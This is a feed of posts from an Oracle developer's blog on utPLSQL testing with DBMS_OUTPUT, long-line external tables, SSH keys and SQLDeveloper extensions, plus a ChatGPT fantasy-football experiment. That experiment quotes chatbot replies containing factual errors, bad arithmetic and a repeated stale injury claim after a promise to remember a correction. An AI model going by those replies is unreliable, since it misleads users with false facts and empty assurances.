The Anti-Kyte

Subscribe to The Anti-Kyte feed The Anti-Kyte
Oracle - for when it was like that when you got there
Updated: 9 hours 43 min ago

Using DBMS_OUTPUT in utPLSQL tests for procedures that don’t perform DML

Mon, 2025-09-08 01:30

This post explores how you can unit test PL/SQL procedures that do not write to the database (other than the log table) by capturing dbms_output statements for use in a utPLSQL expectation.

But first, a news flash

Steven Feuerstein recommends using Skippy !

Sort of.

Well, not in so many words.
In fact, it’s unlikely that he’s aware of the little known Kangaroo aptitude for PL/SQL logging.
What he actually says is “Never put calls to DBMS_OUTPUT.PUT_LINE in your application code” …which initially put a crimp in my day as dbms_output is pretty central to the topic I want to cover here.
If you read the article further, however, he does conclude that (my emphasis):

“The bottom line is that any high quality piece of code should and will include instrumentation/tracing. Moving code into production without this ability leaves you blind when users have problems. So you definitely want to keep that tracing in, but you definitely do not want to use DBMS_OUTPUT.PUT_LINE – or at least rely only on the built-in to get the job done.

This is where Skippy comes in as it allows you to send log messages to the screen, as well as recording them in the logging table.

So, what follows is :

  • a quick recap of how to use the dbms_output buffer to store and retrieve messages without recourse to the SQL*Plus set serveroutput command
  • how to incorporate this into a utPLSQL test
  • how Skippy can save you having to add dbms_output calls directly into your code

But first…

The Problem

I have a PL/SQL procedure that takes an input parameter then does something outside of the database.
Maybe it sends an email, or starts a scheduler job in a different session.
What it doesn’t do is change any data.
Also, it doesn’t return any value.
This makes it difficult to write an automated unit test for.

In this context, the purpose of the unit tests are :

  • to make sure that the procedure provides the expected output for a given input
  • to be runnable automatically ( usually as part of a suite of unit tests)

The code we’ll be testing looks like this :

create or replace procedure never_say_never( i_golden_rule in varchar2)
is
begin
    dbms_output.put_line('Validating input');
    if i_golden_rule is null then
        raise_application_error(-20910, 'Must have a golden rule !');
    end if;

    if length(i_golden_rule) > 75 then
        raise_application_error(-20920, 'Golden rule must be more pithy !');
    end if;
    
    dbms_output.put_line('Input is valid. Processing...');
    dbms_output.put_line('Rule One - '||i_golden_rule);
    --
    -- Do something non-databasey here - send an email, start a scheduler job to run a shell script,
    -- print the golden rule on a tea-towel etc...
    --
    dbms_output.put_line('Rule Two - there are exceptions to EVERY rule');
end;
/

When we run it :

clear screen
set serverout on size unlimited
exec never_say_never('Never put calls to DBMS_OUTPUT.PUT_LINE in your application code');

We get :

Validating input
Input is valid. Processing...
Rule One - Never put calls to DBMS_OUTPUT.PUT_LINE in your application code
Rule Two - there are exceptions to EVERY rule

Our unit tests for this code will check that :

  • if we do not specify a parameter value we will get ORA-20910
  • if we specify a parameter value longer than 75 we will get ORA-20920
  • if we specify a valid parameter, the last output message should be “Rule Two – there are exceptions to EVERY rule“.

For the last of those tests, we need to capture the last message in a variable in PL/SQL.

DBMS_OUTPUT buffering and retrieving messages

Here’s a simple example of using dbms_output to buffer a message and then read it into a variable :

declare
    v_status integer;
    v_message varchar2(32767);
begin
    dbms_output.enable;
    dbms_output.put_line('This is going to the buffer');
    dbms_output.get_line( v_message, v_status);
    if v_status = 1 then
        dbms_output.put_line('No lines in the buffer');
    else
        dbms_output.put_line('Message in buffer : '||v_message);
    end if;
end;
/

When we run this, we get :

Message in buffer : This is going to the buffer


PL/SQL procedure successfully completed.

There are quite a few examples of the get_line procedure in action but less of their it’s plural sibling – get_lines so…

clear screen

-- Flush the buffer so we don't pick up any stray messages from earlier in the session
exec dbms_output.disable; 

declare
    v_status integer;
    v_messages dbmsoutput_linesarray;
begin
    -- Enable the buffer
    dbms_output.enable;

    -- Put some messages into the buffer
    -- dbms_output.put_line('Enabled');
    for i in 1..5 loop
        dbms_output.put_line('Message '||i);
    end loop;
    
    -- Retrieve all of the messages in a single call
    dbms_output.get_lines( v_messages, v_status);
    
    -- the count of messages is one more than the actual number of messages
    -- in the buffer !
    dbms_output.put_line('Message array elements = '||v_messages.count);
    
    for j in 1..v_messages.count - 1 loop
    
        -- Output the messages retrieved from the buffer
        dbms_output.put_line(v_messages(j)||' read from buffer');
    end loop;
    dbms_output.put_line(q'[That's all folks !]');
end;
/

Running this produces the following output :



PL/SQL procedure successfully completed.

Message array elements = 6
Message 1 read from buffer
Message 2 read from buffer
Message 3 read from buffer
Message 4 read from buffer
Message 5 read from buffer
That's all folks !


PL/SQL procedure successfully completed.

Incidentally, if you’re code does contain dbms_output statements that, in hindsight, you would really liked to have written to your persistent log, then the dbms_output.put% procedures offer a method of doing this without necessarily having to change the original code.

The utPLSQL Unit Tests

Now let’s take a look at the unit tests.
For the test that runs without error we’re going to get the last message from the buffer and check that it’s the one we expect.
The utPLSQL Unit Test package is :

create or replace package never_say_never_ut
as

    --%suite(Words of Wisdom)
     
    --%test( no parameter value)
    procedure no_parameter_value;
    
    --%test( parameter_too_long)
    procedure parameter_too_long;
    
    --%test( valid parameter)
    procedure valid_parameter;
end;
/
create or replace package body never_say_never_ut
as

    -- no parameter value
    procedure no_parameter_value
    is
    begin
        never_say_never(null);
        ut.fail('Expected ORA-20910 but no error raised');
    exception when others then
        ut.expect(sqlcode).to_equal(-20910);
    end;    
        
    
    -- parameter_too_long
    procedure parameter_too_long
    is
    begin
        never_say_never('you definitely do not want to ... rely only on the built-in to get the job done');
        ut.fail('Expected ORA-20920 but no error raised');
    exception when others then
        ut.expect(sqlcode).to_equal(-20920);
    end;
    
    -- valid parameter
    procedure valid_parameter
    is
        c_expected constant varchar2(75) := 'Rule Two - there are exceptions to EVERY rule';
        v_messages dbmsoutput_linesarray;
        v_status number;
    begin
        -- Setup
       
        -- flush the buffer
        dbms_output.disable;
        -- enable the buffer
        dbms_output.enable;
        
        -- Execute
        never_say_never('I am never wrong');        
        
        -- Validate
        dbms_output.get_lines(v_messages, v_status);
        
        ut.expect(v_messages(v_messages.count - 1)).to_equal(c_expected);
    exception when others then
        ut.fail(sqlerrm);
    end;
end;
/

Running this, we can see that the procedure passes all the tests :

exec dbms_session.modify_package_state( dbms_session.reinitialize);
set serveroutput on size unlimited
clear screen
exec ut.run('never_say_never_ut');

Words of Wisdom
no parameter value [.002 sec]
Validating input
parameter_too_long [.002 sec]
Validating input
valid parameter [.001 sec]

Finished in .008736 seconds
3 tests, 0 failed, 0 errored, 0 disabled, 0 warning(s)


PL/SQL procedure successfully completed.

That said, Steven does have a point. Of course, there may be circumstances where you want you’re code peppered with dbms_output statements so you can see what’s happening when running interactively but where you don’t necessarily want them clogging up your logging table. However, if you can do your diagnosis using the log messages themselves, then it might be handy to see them output to the screen at runtime as well as being written to the log table…

What’s that Skippy ?

Skippy provides the ability to send log messages to dbms_output as well as the log table. For example :

create or replace procedure never_say_never( i_golden_rule in varchar2)
is
begin
    skippy.set_msg_group('WORDS_OF_WISDOM');
    skippy.log('Validating input');
    if i_golden_rule is null then
        raise_application_error(-20910, 'Must have a golden rule !');
    end if;

    if length(i_golden_rule) > 75 then
        raise_application_error(-20920, 'Golden rule must be more pithy !');
    end if;
    
    skippy.log('Input is valid. Processing...');
    skippy.log('Rule One - '||i_golden_rule);
    --
    -- Do something non-databasey here - send an email, start a scheduler job to run a shell script,
    -- print the golden rule on a tea-towel etc...
    --
    skippy.log('Rule Two - there are exceptions to EVERY rule');
exception when others then 
    skippy.err;
    raise;
end;
/

If we run this as usual…

exec never_say_never('Never use a DML trigger');

… we have to go to the logging table to find the output…

Given that the logging table is likely to be used across the application, finding the exact messages you’ve generated might not be straightforward.

Fortunately, we can also output the messages to the screen as follows :

set serverout on size unlimited
exec skippy.enable_output;
exec never_say_never('Australia win Ashes series at home');
exec skippy.disable_output;

PL/SQL procedure successfully completed.

Validating input
Input is valid. Processing...
Rule One - Australia win Ashes series at home
Rule Two - there are exceptions to EVERY rule

As we’re using skippy, it means we don’t need to have any dbms_output statements in our procedure for us to test it in the same way as before, by updating the valid_parameter test to be :

...
procedure valid_parameter
is
    c_expected constant varchar2(75) := 'Rule Two - there are exceptions to EVERY rule';
    v_messages dbmsoutput_linesarray;
    v_status number;
begin
    -- Setup

    -- flush the buffer
    dbms_output.disable;
    -- enable the buffer
    dbms_output.enable;
    -- Turn on logging output
    skippy.enable_output;

    -- Execute
    never_say_never('I am never wrong');        

    -- Validate
    dbms_output.get_lines(v_messages, v_status);

    ut.expect(v_messages(v_messages.count - 1)).to_equal(c_expected);

    -- Teardown
    skippy.disable_output;

exception when others then
    ut.fail(sqlerrm);
end;
...

So, even when it comes to testing, Skippy will “never” let you down !

Environment used for these examples

These examples were run on an Oracle OCI Free Tier database running Oracle 19c.

Both of the frameworks used in this post are open source.

The Gafferbot Supremacy – why a Goldfish Memory and inability to count are no barrier to Fantasy Football Success

Mon, 2025-08-25 01:30

It’s time for an update on my season-long AI experiment involving ChatGPT (Gafferbot).

Gameweek1 (GW1) has now been completed.

Predictably, one of us has been left feeling as sick as parrot and the other is… in smug mode.
The league doesn’t lie…

Team NamePointsArtificial Idiot (Gafferbot)57Actual Idiot (Me)54

…but it doesn’t really tell the full story either.
Ironically, GafferBot’s early ascendancy can be ascribed in no small part to…er…human error. The full sorry tale will follow presently.
In the meantime, I’d like to take a look at some of behavioural the quirks exhibited by ChatGPT which have become a feature of my interactions with GafferBot so far…

Simple Maths

An acquaintance of mine, who also works in IT, recently commented to me that AI is to the Software Engineer what the calculator is to the Mathematician. From dealing with GafferBot over the last few weeks, I can say that AI could definitely do with a calculator.
For example, this is one of it’s squad suggestions :

I’ll pause here to give you time to check the maths. You may want to get a calculator…

Dear reader, if you do happen to have plugged a generative AI into your payroll system, now may be a good time to review that decision.

There are a number of articles explaining why generative AI has this issue ( although none of them mention it not having fingers to count on). Here’s what ChatGPT had to say for itself :

Me: “Why do you sometimes have problems with simple maths ?”

GafferBot : “That’s a fair question, Mike.

There are a few reasons why I can sometimes slip up on even simple maths:

I don’t actually “calculate” by default – I generate text based on patterns. If you ask me “what’s 27 × 43,” I might recall that multiplication fact from training data rather than working it out step by step. That can lead to mistakes.

Distraction by context – If a maths problem is wrapped in a long or tricky explanation, I might focus more on the surrounding words than the numbers themselves, which raises the chance of an error.

Ambiguity in how the problem is posed – If the maths question has multiple interpretations, I might pick the wrong one unless I slow down and clarify.

Shortcuts in reasoning – I sometimes “pattern-match” to an answer that looks right without properly checking it, especially if it’s a common-looking result.”

It continued :

“To avoid this, when accuracy matters I’ll:

explicitly show the calculation steps,

or use my built-in calculator tool to double-check.

Would you like me to always show my working whenever you ask me a maths question, so you can be confident I haven’t slipped?”

I have now asked it to use it’s built-in calculator tool. I’ll keep my own calculator handy, just in case.

Making stuff up

Another interesting characteristic of GafferBot is it’s tendency to just make stuff up.
For example, during one of our chats, it decided that Mo Salah was an Arsenal player.
As Salah has never played for Arsenal, this can be considered a clear case of incorrect , rather than out-of-date, information.
Apparently, in AI circles, this phenomenon is known as hallucination .

Repeating incorrect information

I’m not sure whether this next character defect is because GafferBot’s been reading about smoking something illegal, or whether it’s distinct from hallucination.

I really hope it isn’t Gafferbot gaslighting me to induce me into the human error I mentioned earlier as the prospect of it playing mind games a la Alex Fergurson is a bit worrying.

The conversation went something like this :

Me : “We currently have Salah as captain and Haaland as Vice-Captain based on your recommentation from our previous conversations. Do you think this is OK, or should we change it ?”

GB : “Salah as captain and Haaland as vice-captain is still the best move for Gameweek 1″…”I can also check any last-minute rotation risk or fixture updates for GW1 to confirm they’re both guaranteed starters. Do you want me to do that ?”

Me : “yes please”

To which GafferBot responds :

Me : “Today is 14th August. Haaland was injured in March but is now fit.”

GB : “Ah, thanks for clarifying, Mike — that makes sense. Since today is 14th August, Erling Haaland is fully fit and ready for Gameweek 1.

So your original captaincy plan still stands:

  • Captain: Mohamed Salah (Liverpool)
  • Vice-Captain: Erling Haaland (Man City)

Both are expected starters with excellent scoring potential. No changes needed.”

A little later in the conversation…

GB : “If you want, I can also check all first-week fixtures and confirm the highest expected point haul for each starting player to double-check your Gameweek 1 choices. Do you want me to do that?”

ME : “yes please”

GafferBot then proceeded to repeat the assertion that Haaland was injured. The response it gave was, in fact, the same word-for-word as it’s original statement on this subject.

ME : “Once again, Haaland is not injured. That report was from March which was 5 months ago.”

GB : “Ah, thanks for confirming, Mike — that makes sense. Since today is 14th August, Haaland is fully fit and ready for Gameweek 1.

So your original captaincy plan remains the best choice:

  • Captain: Mohamed Salah (Liverpool)
  • Vice-Captain: Erling Haaland (Man City)

Both are expected starters with strong scoring potential.

We can now do a final points-potential check for all starting XI players based on their opening fixtures and attacking/defensive potential to ensure the 3‑5‑2 setup is optimal. Do you want me to do that?”

ME : “yes please”

At this point, Gafferbot repeated the Haaland injury story yet again.

ME : “Why do you keep telling me that Haaland is injured ? Your information is out of date. What is preventing you from remembering this ?”

GB : “Ah — I see exactly what’s happening, Mike. Thanks for pointing it out.

Here’s what’s going on:

  • I do not have live awareness of events in real time. When I try to access news about a player, I sometimes pull in stale sources or old reports if my search results include older articles.
  • In Haaland’s case, the March injury story keeps appearing in my search results, so I mistakenly flagged him as unavailable.
  • I don’t automatically retain updates from one search to the next, which is why I keep repeating outdated info unless you explicitly correct me — like you did just now.

The good news: now that you’ve confirmed today’s date and Haaland’s fitness, I can remember for the rest of this conversation that he is fully fit and ready for Gameweek 1.

If you like, I can give a final, fully corrected Gameweek 1 squad and captain/vice-captain summary, ignoring any old injury misinformation. Do you want me to do that?”

I wasn’t entirely convinced by that. Even after confirming today’s date and Haaland’s fitness, the AI had still repeated the out-of-date information regarding the injury.

The Human Touch

After this conversation I was sufficiently discombobulated to assign the captaincy to Haaland instead of Salah.

Whilst Salah scored 8 points in his match ( which would’ve been doubled to 16 if he were captain), Haaland did even better with 2 goals and a 13 point haul.
As Gafferbot’s Captain, that was doubled to 26 points, a net gain of 10 points due to my “assist”.

At time like this, the Fantasy Football Manager – like their real-life counterpart – tends to find refuge in the cliche.
So, I’m hoping that these things will even themselves out over the course of a season.
And remember, it’s a marathon, not a snickers ( something like that anyway).

Oracle External Tables and really really long lines

Wed, 2025-08-20 01:30

One of the things I like about External Tables is that you can use them to read a file on the Database Server OS without having to leave the comfort of the database itself.
Provided you have permissions on a Directory Object pointing to the appropriate directory, it’s a simple matter to create an external table that you can then point at an OS file.
Until recently, I never really though about how this technique could work when it comes to reading lines longer than 4000 characters, but it turns out that there are a couple of ways this can be achieved, which is not to be sneezed at (ironically, given the examples that follow).

This odyssey all the way to the end of the line will encompass :

  • reading long fields – more than 4000 characters
  • reading really long fields and overcoming the default 512K record length limit
  • a look at the new(ish) ORACLE_BIGDATA driver for External Tables

Whilst this tale does have a happy (line) ending, you may want to bring some tissues…

A simple example

For this exercise, I’m running Oracle 19c (19.3) in vagrant.
I have a directory object called INCOMING_FILES on /u01/incoming_files, which contains some txt files.
Note that each file only contains a single line of data, so the file size is the size of that line :

The External Table I’m using to read files is :

create table view_file_xt
(
    line number,
    text varchar2(4000)
)
organization external
(
    type oracle_loader
    default directory incoming_files
    access parameters 
    (
        records delimited by newline
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
            line recnum,
            text char(4000)
        )
    ) 
    location('')
)
reject limit unlimited
/

Obviously, there’s no issue reading the smallest of the three files :

However if we want to open hayfever.txt ( 4.9K), we’re going to need to tweak our external table.

Beyond (about) 4K


Fortunately, the external table field specification data types are not the same as the SQL datatype, which means we can do this :

drop table view_file_xt;

create table view_file_xt
(
    line number,
    text clob
)
organization external
(
    type oracle_loader
    default directory incoming_files
    access parameters 
    (
        records delimited by newline
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
                line recnum,
                text char(8000)
        )
    ) 
    location('')
)
reject limit unlimited
/

This allows us to read the larger value without any issues :

select line, text, 
from view_file_xt external modify( location( 'hayfever.txt'));

It’s a bit of a pain to print out the entire contents of text ( it’s just the letter ‘A’ 5000 times with “choo!” at the end), but using the external table to report the line length is enough to demonstrate that this change works :

select line, length(text)
from view_file_xt external modify( location( 'hayfever.txt'));

  LINE    LENGTH(TEXT) 
_______ _______________ 
      1            5005 
Getting a bit silly now

I’ll admit that this is something of an edge case, but if, for example, you want to look at a “wide” CSV file to see why it’s not loading then you may just conceivably need to accomodate a 2MB long line. Still, shouldn’t be an issue, we just need to adjust the size of the text field specification, right ?

drop table view_file_xt;

create table view_file_xt
(
    line number,
    text clob
)
organization external
(
    type oracle_loader
    default directory incoming_files
    access parameters 
    (
        records delimited by newline
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
                line recnum,
                text char(2097152)
        )
    ) 
    location('')
)
reject limit unlimited
/

When we run the query against our 2MB file, we get an unpleasant surprise :

select length(text) from view_file_xt external modify( location('man_flu.txt'))
/


ORA-29913: error in executing ODCIEXTTABLEFETCH callout
ORA-29400: data cartridge error
KUP-04020: found record longer than buffer size supported, 524288, in /u01/incoming_files/man_flu.txt (offset=0) https://docs.oracle.com/error-help/db/ora-29913/
Either processing the specified data cartridge routine caused an error, or the implementation of the data cartridge routine returned the ODCI_ERROR return code
Error at Line: 1 Column: -1

It’s worth noting that the error is triggered if an entire record is larger than the stated size, irrespective of the size of individual columns that comprise the record.

In order to make this work, we need to use one of the more obscure (to me, at least) external table parameters – readsize, an example of which Emanual Cifuentes has posted here.

With this tweak…

drop table view_file_xt;

create table view_file_xt
(
    line number,
    text clob
)
organization external
(
    type oracle_loader
    default directory incoming_files
    access parameters 
    (
        records delimited by newline
        readsize 2097152
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
            line recnum,
            text char(2097152)
        )
    ) 
    location('')
)
reject limit unlimited
/

…our query works :

select length(text) from view_file_xt external modify( location('man_flu.txt'))
/

  LENGTH(TEXT) 
_______________ 
        2000005 
The ORACLE_BIGDATA Access Driver

I’ve included this section because this is the first time I’ve encountered this external table type and I haven’t found a code example for it anywhere apart from the Oracle documentation itself.

That said, I’ll admit that it’s a less than ideal solution for the challenge at hand. So, for what it’s worth…

drop table view_file_xt;

create table view_file_xt
(
    text clob
)
    organization external(
        type oracle_bigdata
        default directory incoming_files
        access parameters 
        (
            com.oracle.bigdata.fileformat=textfile
            com.oracle.bigdata.blankasnull=true
            com.oracle.bigdata.csv.rowformat.fields.terminator='\n'
            com.oracle.bigdata.ignoreblanklines=true
            com.oracle.bigdata.buffersize=2048
        ) 
        location('')
    )
    reject limit unlimited
/

Note that the Buffer Size is specified in Kilobytes rather than bytes.
Perhaps a more pertinent difference here is that you can’t use the EXTERNAL MODIFY clause for this type of external table :

select length(text)
from view_file_xt external modify( location('man_flu.txt'))
/

ORA-30417: The EXTERNAL MODIFY clause cannot be used to modify the location for an ORACLE_BIGDATA external table. https://docs.oracle.com/error-help/db/ora-30417/
The EXTERNAL MODIFY clause was used to change the location for an ORACLE_BIGDATA external table
Error at Line: 2 Column: 5

Instead we have to point the External Table at the file the old-fashioned way…

alter table view_file_xt location('man_flu.txt');

select length(text)
from view_file_xt
/

LENGTH(TEXT)
------------
     2000005
What is the Maximum Buffer Size

The answer to this appears to be “it depends”.

The maximum size of a CLOB is 4GB. However, the maximum buffer size for an ORACLE_BIGDATA table appears to be 10240 KB ( 10 MB) :

create table view_file_xt
(
    text clob
)
    organization external(
        type oracle_bigdata
        default directory incoming_files
        access parameters 
        (
            com.oracle.bigdata.fileformat=textfile
            com.oracle.bigdata.blankasnull=true
            com.oracle.bigdata.csv.rowformat.fields.terminator='\n'
            com.oracle.bigdata.ignoreblanklines=true
            com.oracle.bigdata.buffersize=4194304
        ) 
        location('')
    )
    reject limit unlimited
/

alter table view_file_xt location('man_flu.txt');

select length(text)
from view_file_xt
/

ORA-29913: error in executing ODCIEXTTABLEOPEN callout
ORA-29400: data cartridge error
KUP-11530: value for com.oracle.bigdata.buffersize larger than maximum allowed value 10240 https://docs.oracle.com/error-help/db/ora-29913/
Either processing the specified data cartridge routine caused an error, or the implementation of the data cartridge routine returned the ODCI_ERROR return code
Error at Line: 1 Column: -1

By contrast, the trusty ORACLE_LOADER driver appears to be able to go much higher. I believe that the exact limit may be dependent on your environment ( and how much memory you want to hog to read a file the lazy way).

In this test environment, I managed to get up to around 500MB…

drop table view_file_xt;

create table view_file_xt
(
    line number,
    text clob
)
organization external
(
    type oracle_loader
    default directory incoming_files
    access parameters 
    (
        records delimited by newline
        readsize 524288000
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
            line recnum,
            text char(524288000)
        )
    ) 
    location('')
)
reject limit unlimited
/
select length(text)
from view_file_xt external modify ( location( 'man_flu.txt'))

LENGTH(TEXT)
------------
     2000005

When I tested 512MB (536870912) I got :

SQL Error: ORA-29913: error in executing ODCIEXTTABLEFETCH callout
ORA-29400: data cartridge error
KUP-04050: error while attempting to allocate 536870912 bytes of memory
References

The Oracle Docs are a veritable trove on the subject of External Tables.
The documentation of readsize is here .
There’s also a section on the ORACLE_BIGDATA Access Driver .

GafferBot – a journey into AI through the medium of Fantasy Football

Sun, 2025-08-03 07:57

The promise of 100% code generation – thus making Software Engineers obsolete – has been around for pretty much my entire career.
Right now, the tsunami of hype surrounding AI has encompassed this particular claim in the form of “Vibe Coding”.
Whenever this topic comes up on one of my social media feeds, I comfort myself by performing a little test.
I ask the AI on my phone to pick a Fantasy Football Team .

Recent results have lead me to reflect that, whilst Harry Kane is a wonderful player, he’s not going to score many goals in the English Premier League whilst playing for Bayern Munich.
Also, picking 4 goalkeepers could be considered a bold strategy, as could selecting a team with only 10 players.

Whilst these AI pronouncements – made with the self-assurance ( and accuracy) of some bloke down the pub – are something of a comfort, I do feel a bit like a dinosaur, shouting at the meteorite that’s hurtling towards me.
Therefore, rather than sneering at it, I’ve decided to embark upon a journey toward understanding just what AI is capable of right now and how I might use it to best effect.
To this end, I’m going to ask ChatGPT to manage a squad throughout the course of the coming season.
I’ll be using the default chatbot here, not any specialised GPTs.

Fantasy Football would appear to be a good testing ground.
The parameters within which a squad must operate are clearly defined.
Additionally, the results are easily verifiable – something that’s quite important given AI’s sometimes equivocal relationship with facts.

When I asked it what it would like to be called in the context of this exercise, ChatGPT came up with the name “GafferBot”. Let’s face it, that could’ve been a whole lot worse ( although it may have considered that Apple TV have the copyright on “MurderBot” ).

I will be acting as Assistant Manager ( well, more of an Igor) to GafferBot’s team, which I have named – not without malice – “Artificial Idiot”.
Deb has assumed the role of General Manager in the hope that she can channel the most successful manager in English football right now – Sarina Wiegman.

As a control, I will be entering and managing my own squad – “Actual Idiot”.

It’s still a couple of weeks until the season starts but we have made a first attempt at picking a squad.
After some trial and error, GafferBot has settled on this lineup :

In the course of the ChatGPT squad selection session a couple of things became apparent.
GafferBot’s information was a bit out-of-date when it came to player values, and even what teams were competing in the EPL this season. It did make a couple of attempts to pick Luton Town players, for example, despite them having been relegated the season before last.
At one point, the proposed squad was over the maximum value allowed by £3.5 million, but the changes then proposed by GafferBot would have reduced the value by only £0.5m.
This appears to be symptomatic of ChatGPT’s sometimes tenuous grasp of basic arithmetic.
At the end of the session, I pointed GafferBot as some relevant links and asked it to remember them for future sessions. The links are :

We’ll need to revisit the squad ahead of the start of the season as players are still being transferred into and out of the league. It will be interesting to see if these links are now considered by GafferBot.
One indication of this will be to check that the values of any players mentioned by the AI are up-to-date.

I’m trying to keep a positive attitude toward the forthcoming season. If Artificial Idiot does somehow prevail in the Idiot derby, at least I’ll have someone to help me write my CV.

Passwordless connection to a Linux server using SSH

Tue, 2025-07-22 01:30

It seems that the 90s are back in fashion.
Not only are Oasis currently making headlines, but England’s Women have just won a penalty shootout which featured Lucy Bronze chanelling 1996-vintage Stuart Pearce.
SSH also originates from the 90s, but unlike Britpop, has remained current ever since.
It will work ( and is standard on) pretty much any Linux server.
Whilst, I don’t happen to have a cluster of production servers attached to my home network, I do have a RaspberryPi running on Raspbian 11 (Bullseye) so I’ll be connecting to that from my Ubuntu laptop in the steps that follow…

Confirming Connectivity

On my laptop ( Ubuntu 24.04), I have an entry in /etc/hosts for the Pi to save me from having to remember the IP Address whenever I want to connect. To confirm that the Pi is available :

ping -c1 pithree.home

Now we need to confirm that SSH is present on both the client machine and the server we’re connecting to. We can do this by running :

ssh -V

On the Ubuntu client this returns:

OpenSSH_9.6p1 Ubuntu-3ubuntu13.12, OpenSSL 3.0.13 30 Jan 2024

…and on the Pi…

OpenSSH_7.4p1 Raspbian-10+deb9u7, OpenSSL 1.0.2u  20 Dec 2019

I can test the connection to the Pi ( connecting as the user “pi”) by running this from the client :

ssh pi@pithree.home

The first time you use SSH to connect to a server, you will be presented with a message like this :

Answering “yes” will add the server to the list of known hosts :

I will then be prompted for the password for the pi user that I’m connecting as.

Enter this correctly and we’re in :

Now we’ve confirmed that we can connect using SSH, we want to set things up so we can do it without needing to provide a password each time…

Configuring key-based Authentication

To use key-based authentication, we’ll need to generate an SSH Key Pair on the client machine. This will consist of a Public Key and a Private Key. We will then need to deploy our public key to the server.

To generate the key-pair :

ssh-keygen

In my case, I’ve left both the prompts for the filename and the passphrase blank :

As a result, two files have been created under the .ssh directory in the user I’m connected as :

cd $HOME/.ssh
ls -l id_ed25519*
-rw------- 1 mike mike 411 Jul 18 15:22 id_ed25519
-rw-r--r-- 1 mike mike 103 Jul 18 15:22 id_ed25519.pub

Note that the file without the extension holds the private key and the file with the .pub extension contains the public key.

To copy the public key to the target server, we’re going to make use of the tool ssh provides.

For this, we’ll need the path of the file holding the public key and the user and servername that we’re connecting to.

ssh-copy-id -i $HOME/.ssh/id_ed25519.pub pi@pithree.home

Once we’ve run this, we can connect to the server without being prompted for a password :

User Defined Extensions in SQLDeveloper Classic – something you can’t do in VSCode (yet)

Sun, 2025-06-01 06:16

I can tell you from personal experience that, when you reach a certain point in your life, you start looking for synonyms to use in place of “old”.
If your a venerable yet still useful Oracle IDE for example, you may prefer the term “Classic”.
One thing SQLDeveloper Classic isn’t is obsolete. It still allows customisations that are not currently available in it’s shiny new successor – the SQLDeveloper extension for VSCode.
Fortunately, there’s no reason you can’t run both versions at the same time – unless your corporate IT has been overzealous and either packaged VSCode in an MSI that prohibits installation of extensions or has a policy preventing extensions running because “security”.
Either way, SQLDeveloper Classic is likely to be around for a while.
One particular area where Classic still has the edge over it’s shiny new successor is when it comes to user-defined extensions.
In this case – finding out the partition key and method of a table without having to wade through the DDL for that object…

Table Partitioning Meta Data

The following query should give us what we’re after – details of the partitioning and sub-partitioning methods used for a table, together with a list of the partition and (if applicable) sub-partition key columns :

with part_cols as
(
    select 
        owner,
        name,
        listagg(column_name, ', ') within group ( order by column_position) as partition_key_cols
    from all_part_key_columns
    group by owner, name
),
subpart_cols as
(
    select 
        owner,
        name,
        listagg(column_name, ', ') within group ( order by column_position) as subpartition_key_cols
    from all_subpart_key_columns
    group by owner, name
)
select 
    tab.owner, 
    tab.table_name, 
    tab.partitioning_type, 
    part.partition_key_cols,
    tab.subpartitioning_type,
    sp.subpartition_key_cols
from all_part_tables tab
inner join part_cols part    
    on part.owner = tab.owner 
    and part.name = tab.table_name 
left outer join subpart_cols sp 
    on sp.owner = tab.owner 
    and sp.name = tab.table_name
where tab.owner = 'SH'
and table_name = 'SALES'
order by 1,2
/

That’s quite a lot of code to type in – let alone remember – every time we want to check this metadata, so let’s just add an extra tab to the Table view in SQLDeveloper.

Using this query, I’ve created an xml file called table_partitioning.xml to add a tab called “Partition Keys” to the SQLDeveloper Tables view :

<items>
    <item type="editor" node="TableNode" vertical="true">
        <title><![CDATA[Partition Keys]]></title>
        <query>
            <sql>
                <![CDATA[
                    with part_cols as
                    (
                        select 
                            owner,
                            name,
                            listagg(column_name, ', ') within group ( order by column_position) as partition_key_cols
                        from all_part_key_columns
                        group by owner, name
                    ),
                    subpart_cols as
                    (
                        select 
                            owner,
                            name,
                            listagg(column_name, ', ') within group ( order by column_position) as subpartition_key_cols
                        from all_subpart_key_columns
                        group by owner, name
                    )
                    select 
                        tab.owner, 
                        tab.table_name, 
                        tab.partitioning_type, 
                        part.partition_key_cols,
                        tab.subpartitioning_type,
                        sp.subpartition_key_cols
                    from all_part_tables tab
                    inner join part_cols part    
                        on part.owner = tab.owner 
                        and part.name = tab.table_name 
                    left outer join subpart_cols sp 
                        on sp.owner = tab.owner 
                        and sp.name = tab.table_name
                    where tab.owner = :OBJECT_OWNER
                    and table_name = :OBJECT_NAME
                    order by 1,2
                ]]>
            </sql>
        </query>
    </item>
</items>

Note that we’re using the SQLDeveloper supplied ( and case-sensitive) variables :OBJECT_OWNER and :OBJECT_NAME so that the data returned is for the table that is in context when we open the tab.

If you are familiar with the process of adding User Defined Extensions to SQLDeveloper and want to get your hands on this one, just head over to the Github Repo where I’ve uploaded the relevant file.
You can also find instructions for adding the tab to SQLDeveloper as a user defined extension there.
They are…

Adding a User Defined Extension

In SQLDeveloper select the Tools Menu then Preferences.

Search for User Defined Extensions

Click the Add Row button then click in the Type field and select Editor from the drop-down list

In the Location field, enter the full path to the xml file containing the extension you want to add

Hit OK

Restart SQLDeveloper.
When you select an object of the type for which this extension is defined ( Tables in this example), you will see the new tab has been added

The new tab will work like any other :

Useful Links

The documentation for Extensions has been re-organised in recent years, but here are some links you may find useful :

As you’d expect, Jeff Smith has published a few articles on this topic over the years. Of particular interest are :

The Oracle-Samples GitHub Repo contains lots of example code and some decent instructions.

I’ve also covered this topic once or twice over the years and there are a couple of posts that you may find helpful :

Setting up a Local Only SMTP server in Ubuntu

Tue, 2025-05-06 01:30

If you’re using bash scripts to automate tasks on your Ubuntu desktop but don’t want to have to wade through logs to find out what’s happening, you can setup a Local Only SMTP server and have the scripts mail you their output.
Being Linux, there are several ways to do this.
What follows is how I managed to set this up on my Ubuntu 24_04 desktop (minus all the mistakes and swearing).
Specifically we’ll be looking at :

  • installing Dovecot
  • installing and configuring Postfix
  • installing mailx
  • configuring Thunderbird to handle local emails

